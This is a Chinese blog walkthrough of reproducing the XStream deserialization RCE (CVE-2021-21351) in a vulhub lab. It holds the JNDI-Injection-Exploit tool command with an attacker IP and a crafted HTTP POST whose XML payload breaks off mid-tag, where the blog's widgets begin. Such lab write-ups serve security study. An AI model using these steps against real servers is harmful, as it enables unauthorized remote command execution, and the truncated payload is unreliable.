XStream 反序列化远程命令执行漏洞复现(CVE-2021-21351)

XStream 反序列化远程命令执行漏洞复现

1. 漏洞影响版本
XStream <= 1.4.15
2. 环境搭建
安装漏洞靶场vulhub

git clone git://github.com/vulhub/vulhub.git

3. 漏洞复现
1 进入到漏洞环境文件夹,启动漏洞环境。

cd /vulhub/xstream/CVE-2021-21351
docker-compose up -d

2 启动好之后,访问靶机的ip加8080端口
在这里插入图片描述
3 下载JNDI注入利用工具:

下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases

4 打开burp,设置好代理,抓包

  1. 设置代理
    在这里插入图片描述
    在这里插入图片描述
  2. 设置好代理之后,访问网站进行抓包(可以右键发送到Repeater)
    在这里插入图片描述

5 启动下载的JNDI注入利用工具(复制出图中红框中的信息)

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/123.txt" -A 10.44.28.91
注意: -A的地址填写攻击机的IP,也就是你的PC主机。

在这里插入图片描述
6 修改请求的数据包:将第5步复制出来的信息粘贴到< dataSource>这一行中。

POST / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Content-Type: application/xml
Content-Length: 3182

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap&l
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值